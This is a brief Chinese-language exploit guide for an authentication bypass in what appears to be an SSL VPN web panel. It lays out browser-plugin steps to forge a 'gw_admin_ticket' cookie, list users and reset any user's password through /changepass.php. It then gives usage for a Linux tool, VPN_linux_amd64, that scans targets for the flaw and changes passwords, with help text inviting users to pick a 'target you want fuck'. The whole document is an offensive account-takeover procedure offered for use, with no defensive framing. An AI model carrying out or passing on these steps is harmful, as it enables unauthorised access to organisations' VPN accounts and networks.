1.使用cookie editor插件添加cookie值gw_admin_ticket为1.
2.使用charset插件修改网页编码为utf-8使页面正常显示
3.获取到用户名信息.
4.使用hackbar对地址/changepass.php?type=2发送修改密码数据,并将cookie值修改为如下,this_name为你需要修改密码的用户名称.
5.返回修改密码成功.可能会提示密码强度不够可以尝试随机生成字符串来生成。
1.下载对应系统版本工具
./VPN_linux_amd64 -h
Usage of VPN_linux_amd64:
-c check target vuln.(default) (default true)
-e change user's password.
-p string
manual set password you want change.(default is generate by random.) (default "BpLnfgDsc3WD")
-t int
request timeout default is 5 second. (default 5)
-u string
target you want fuck.(example:https://xxxxx:xxx)
2.参数介绍
参数 | 含义 |
---|---|
c | 检测模块,默认启用,存在漏洞的话会输出目标的用户列表. |
e | 修改密码模块,默认不启用. |
p | 更改后的密码,默认随机生成. |
t | 请求超时时间,默认为5s. |
u | 需要检测的目标url地址,. |